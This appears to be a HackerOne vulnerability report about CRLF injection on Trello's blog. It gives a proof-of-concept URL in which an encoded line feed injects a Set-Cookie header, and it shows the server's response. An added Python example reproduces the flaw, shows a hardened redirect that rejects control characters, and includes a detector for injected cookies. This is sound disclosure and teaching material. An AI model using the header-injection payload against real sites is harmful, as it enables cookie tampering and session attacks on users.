Trello: [blog.trello.com] CRLF Injection

2015-01-28T10:49:12
ID H1:45514
Type hackerone
Reporter bobrov
Modified 2016-09-25T16:16:02

Description

PoC: https://blog.trello.com/%0aSet-Cookie:CRLF=INJECTION;domain=.trello.com

HTTP Response:
> HTTP/1.1 301 Moved Permanently
> Server: nginx
> Date: Wed, 28 Jan 2015 10:47:51 GMT
> Content-Type: text/html
> Content-Length: 178
> Connection: close
> Location: http://blog.trello.com/
> Set-Cookie:CRLF=INJECTION;domain=.trello.com

Result: the injected header sets a cookie "CRLF=INJECTION" for *.trello.com (domain=.trello.com), because the percent-encoded line feed (%0a) in the request path is decoded and copied unchanged into the Location header of the 301 response, which ends the Location line and starts a new header.
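The following is an added example, not code from the report or from Trello: a constructed redirect handler that reproduces the defect described above (percent-decoding the path and pasting it into Location without rejecting control characters), the hardened version that refuses CR/LF before the value reaches a header, and a small lenient header parser so both can be checked for an unintended Set-Cookie. The handler, the parser and the function names are assumptions; only the host and the shape of the PoC path come from the report.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Host from the report; everything else in this file is a constructed illustration.
HOST = "blog.trello.com"
# Constructed request path in the shape of the report's PoC URL.
POC_PATH = "/%0aSet-Cookie:CRLF=INJECTION;domain=.trello.com"
# CR, LF, NUL and every other ASCII control byte; none of them belong in a header value.
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def build_redirect_vulnerable(raw_path: str) -> bytes:
    """'Before' behaviour (constructed): percent-decode the path and paste it into
    Location unchanged, so %0a turns into a real line break inside the header."""
    target = unquote(raw_path)
    head = [
        "HTTP/1.1 301 Moved Permanently",
        f"Location: http://{HOST}{target}",
        "Content-Length: 0",
    ]
    return ("\r\n".join(head) + "\r\n\r\n").encode("latin-1")


def safe_redirect_target(raw_path: str) -> str:
    """Hardened check: refuse any control character in the decoded path so it can
    never terminate the Location line. Validate after decoding, not before, since
    the attacker-controlled bytes only appear once %0a/%0d are decoded."""
    target = unquote(raw_path)
    if CONTROL.search(target):
        raise ValueError("control character in redirect target")
    return target


def build_redirect_hardened(raw_path: str) -> bytes:
    """Same redirect, but the target is validated first; an unsafe path gets a 400."""
    try:
        target = safe_redirect_target(raw_path)
    except ValueError:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    head = [
        "HTTP/1.1 301 Moved Permanently",
        f"Location: http://{HOST}{target}",
        "Content-Length: 0",
    ]
    return ("\r\n".join(head) + "\r\n\r\n").encode("latin-1")


def response_headers(raw: bytes) -> list[tuple[str, str]]:
    """Lenient parser that, like the nginx response in the report, accepts a bare LF
    as a line terminator; returns (name, value) pairs with lower-cased names."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = re.split(r"\r?\n", head)[1:]  # drop the status line
    pairs = []
    for line in lines:
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def injected_cookies(raw: bytes) -> list[str]:
    """Detection helper: Set-Cookie values in a response from a handler that never
    intended to set a cookie. Anything returned here is evidence of header injection."""
    return [v for n, v in response_headers(raw) if n == "set-cookie"]


if __name__ == "__main__":
    print(build_redirect_vulnerable(POC_PATH).decode("latin-1"))
    print("injected:", injected_cookies(build_redirect_vulnerable(POC_PATH)))
    print(build_redirect_hardened(POC_PATH).decode("latin-1"))
    print("injected:", injected_cookies(build_redirect_hardened(POC_PATH)))
```

Rejecting the request (400) is the simplest safe choice for a redirect whose target is derived from the path; stripping the control characters instead would silently redirect to an attacker-shaped URL. The same check belongs on any value that ends up in a response header (Location, Set-Cookie, Content-Disposition), and it should run after any decoding step, since that is where the raw CR/LF bytes first appear.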